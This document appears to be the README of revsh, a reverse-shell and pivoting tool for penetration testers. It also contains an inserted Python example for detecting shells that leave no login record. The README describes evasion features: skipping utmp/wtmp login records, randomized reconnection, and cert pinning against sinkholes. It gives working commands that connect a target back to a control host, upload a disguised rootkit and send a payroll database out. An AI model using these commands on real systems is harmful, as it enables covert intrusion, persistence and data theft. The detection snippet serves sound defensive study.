A reverse shell with terminal support, data tunneling, and advanced pivoting capabilities.

revsh

revsh is a tool for establishing reverse shells with terminal support, reverse VPNs for advanced pivoting, as well as arbitrary data tunneling.

What is a "reverse shell"?

A reverse shell is a network connection that grants shell access to a remote host. As opposed to other remote login tools such as telnet and ssh, a reverse shell is initiated by the remote host. This technique of connecting outbound from the remote network allows for circumvention of firewalls that are configured to block inbound connections only.

What is a "reverse VPN"?

revsh is capable of attaching a virtual Ethernet card (tun/tap) to both ends of its crypto tunnel. These cards can then be used to forward raw IP packets or Ethernet frames. When combined with an iptables NAT rule, or by bridging a real Ethernet card, this allows the operator to receive a fully routable IP address on the target machine's network. This is essentially a full VPN that has performed a connect-back call to the operator to circumvent inbound packet filtering and grant the operator full network access.

What is a "bind shell"?

A bind shell is a shell that is served from a normal forward network connection. revsh supports both reverse and bind shells. To invoke a bind shell you can either invoke the -b flag on both ends of the connection, or invoke the binary as 'bindsh'.

Can't I just use netcat?

There are many techniques for establishing a reverse shell, but these methods don't provide terminal support. revsh allows for a reverse shell whose connection is mediated by a pseudo-terminal, and thus allows for features such as:

In addition, revsh also offers the following features:

  • UTF-8 support.
  • Circumvents utmp / wtmp. (No login recorded.)
  • Processes rc file commands upon login for easy scripting.
  • OpenSSL encryption with key based authentication baked into the binary.
  • Anonymous Diffie-Hellman encryption upon request.
  • Ephemeral Diffie-Hellman encryption as default. (Now with more Perfect Forward Secrecy!)
  • Cert pinning for protection against sinkholes and mitm counter-intrusion.
  • Connection timeout for remote process self-termination.
  • Randomized retry timers for non-predictable auto-reconnection.
  • Netcat style non-interactive data brokering for file transfer.
  • Proxy support: point-to-point, SOCKS 4, SOCKS 4a, and SOCKS 5. Proxies are available in both directions for complete flexibility.
  • TUN / TAP support for forwarding raw IP packets / Ethernet frames.
  • Escape sequence commands to kill non-responsive nodes, or print connection statistics.
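The utmp / wtmp point above has a detection consequence: a revsh session leaves no login record, so who(1) and last(1) will not show it, but the shell it spawns still holds a pseudo-terminal that is visible through /proc. The following added example (not part of revsh or the original README) decodes the controlling tty from /proc/[pid]/stat and cross-checks shells on a pty against the terminals utmp reports via who(1); the stat lines and who output are constructed samples, and the shell names list is an assumption.

```python
# Unix98 pty slaves use character-device majors 136..143; /dev/pts/N maps to
# major 136 + N // 256, minor N % 256.
PTS_MAJOR_FIRST, PTS_MAJOR_LAST = 136, 143

def pts_name_from_tty_nr(tty_nr):
    """Decode the tty_nr field of /proc/[pid]/stat (Linux dev_t packing:
    major in bits 8-19, minor in bits 0-7 and 20-31) to 'pts/N', else None."""
    if tty_nr <= 0:
        return None
    major = (tty_nr >> 8) & 0xfff
    minor = (tty_nr & 0xff) | ((tty_nr >> 12) & 0xfff00)
    if PTS_MAJOR_FIRST <= major <= PTS_MAJOR_LAST:
        return "pts/%d" % ((major - PTS_MAJOR_FIRST) * 256 + minor)
    return None

def parse_proc_stat(line):
    """Return (pid, comm, tty_nr) from one /proc/[pid]/stat line.
    comm is parenthesised and may contain spaces or ')', so split on the
    last ')' instead of on whitespace."""
    head, _, rest = line.rpartition(")")
    pid_text, comm = head.split("(", 1)
    fields = rest.split()          # state ppid pgrp session tty_nr ...
    return int(pid_text), comm, int(fields[4])

def recorded_terminals_from_who(who_output):
    """Collect the terminal names (second column of who(1)) that utmp knows."""
    return {ln.split()[1] for ln in who_output.splitlines() if ln.strip()}

def find_unrecorded_pty_shells(stat_lines, who_output,
                               shells=("bash", "sh", "zsh", "dash")):
    """Shells attached to a pty for which utmp holds no login entry."""
    recorded = recorded_terminals_from_who(who_output)
    hits = []
    for line in stat_lines:
        pid, comm, tty_nr = parse_proc_stat(line)
        pts = pts_name_from_tty_nr(tty_nr)
        if pts and comm in shells and pts not in recorded:
            hits.append((pid, comm, pts))
    return hits

# Constructed samples (not captured from a real host); trailing stat fields cut.
SAMPLE_STAT = [
    "1234 (bash) S 1230 1234 1234 34816 1234 4194304 1203 0 0 0",   # pts/0
    "3456 (sshd) S 1 3456 3456 0 -1 4194560 300 0 0 0",             # no tty
    "4567 (sh) S 4560 4567 4567 34817 4567 4194304 300 0 0 0",      # pts/1
    "7777 (we)ird) S 1 7777 7777 0 -1 4194560 10 0 0 0",            # odd comm
]
SAMPLE_WHO = ("alice    pts/0        2016-10-14 09:12 (10.0.0.5)\n"
              "bob      tty1         2016-10-14 08:00\n")

if __name__ == "__main__":
    for pid, comm, pts in find_unrecorded_pty_shells(SAMPLE_STAT, SAMPLE_WHO):
        print("pid %d (%s) on %s has no utmp login entry" % (pid, comm, pts))
```

On a live host, feed it the contents of every /proc/*/stat and the output of `who`; a hit is not proof of compromise (tmux panes and some terminal emulators also skip utmp), but it is the record that revsh deliberately avoids leaving.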

revsh is intended as a supplementary tool for a pentester's toolkit that provides the full set of terminal features across an encrypted tunnel, all together in a small (~75k), easy-to-use binary.

Where can I use revsh?

revsh was developed on x86_64 Linux. Here is a brief list of Arch / OS combinations that it has been used on:

  • x86_64 Linux
  • i686 Linux
  • amd64 FreeBSD

(If you have successfully used revsh on another platform, drop me a line and I'll add it to the list.)

Usage

empty@monkey:~$ revsh -h

Control:    revsh -c [CONTROL_OPTIONS] [MUTUAL_OPTIONS] [ADDRESS[:PORT]]
Target:     revsh     [TARGET_OPTIONS] [MUTUAL_OPTIONS] [ADDRESS[:PORT]]

CONTROL_OPTIONS:
  -c           Run in "command and control" mode.             (Default is target mode.)
  -a           Enable Anonymous Diffie-Hellman mode.          (Default is Ephemeral Diffie-Hellman.)
  -d KEYS_DIR  Reference the keys in an alternate directory.  (Default is "~/.revsh/keys/".)
  -f RC_FILE   Reference an alternate rc file.                (Default is "~/.revsh/rc".)
  -s SHELL     Invoke SHELL as the remote shell.              (Default is "/bin/bash".)
  -F LOG_FILE  Log general use and errors to LOG_FILE.        (No default set.)

TARGET_OPTIONS:
  -t SEC       Set the connection timeout to SEC seconds.     (Default is "3600".)
  -r SEC1,SEC2 Set the retry time to be SEC1 seconds, or      (Default is "600,1200".)
               to be random in the range from SEC1 to SEC2.

MUTUAL_OPTIONS:
  -k           Run in keep-alive mode. Node will neither
               exit normally, nor seppuku from timeout.
  -L [LHOST:]LPORT:RHOST:RPORT
               Static socket forwarding with a local
               listener at LHOST:LPORT forwarding to
               RHOST:RPORT.
  -R [RHOST:]RPORT:LHOST:LPORT
               Static socket forwarding with a remote
               listener at RHOST:RPORT forwarding to
               LHOST:LPORT.
  -D [LHOST:]LPORT
               Dynamic socket forwarding with a local
               listener at LHOST:LPORT.                       (Socks 4, 4a, and 5. TCP connect only.)
  -B [RHOST:]RPORT
               Dynamic socket forwarding with a remote
               listener at LHOST:LPORT.                       (Socks 4, 4a, and 5. TCP connect only.)
  -x           Disable automatic setup of proxies.            (Defaults: Proxy D2280 and tun/tap devices.)
  -b           Start in bind shell mode.                      (Default is reverse shell mode.)
               The -b flag must be invoked on both ends.
  -n           Non-interactive netcat style data broker.      (Default is interactive w/remote tty.)
               No tty. Useful for copying files.
  -v           Verbose. -vv and -vvv increase verbosity.
  -h           Print this help.
  -e           Print out some usage examples.

  ADDRESS      The address of the control listener.           (Default is "0.0.0.0".)
  PORT         The port of the control listener.              (Default is "2200".)

Installation

sudo apt-get install openssl libssl-dev     # Pre-req for building.
git clone https://github.com/emptymonkey/revsh.git
cd revsh
vi config.h        # Set up new defaults that fit your situation.
make               # This *can* take a very long time, though it usually doesn't.
make install
cd ~/.revsh
vi rc              # Add your favorite startup commands to really customize the feel of your remote shell.
revsh -h

Examples

Control host example IP: 192.168.0.42
Target host example IP: 192.168.0.66

Interactive example on default port '2200':
    control:    revsh -c
    target:     revsh 192.168.0.42

Interactive example on non-standard port '443':
    control:    revsh -c 192.168.0.42:443
    target:     revsh 192.168.0.42:443

Bindshell example:
    target:     revsh -b
    control:    revsh -c -b 192.168.0.66

Non-interactive file upload example:
    control:    cat ~/bin/rootkit | revsh -c -n
    target:     revsh 192.168.0.42 > ./totally_not_a_rootkit

Non-interactive file download example:
    control:    revsh -c -n >payroll_db.tar
    target:     cat payroll_db.tar | revsh 192.168.0.42

Non-interactive file download example across existing tunnel:
    control:    revsh -c -n 127.0.0.1:2291 >payroll_db.tar
    target:     cat payroll_db.tar | revsh 127.0.0.1:2290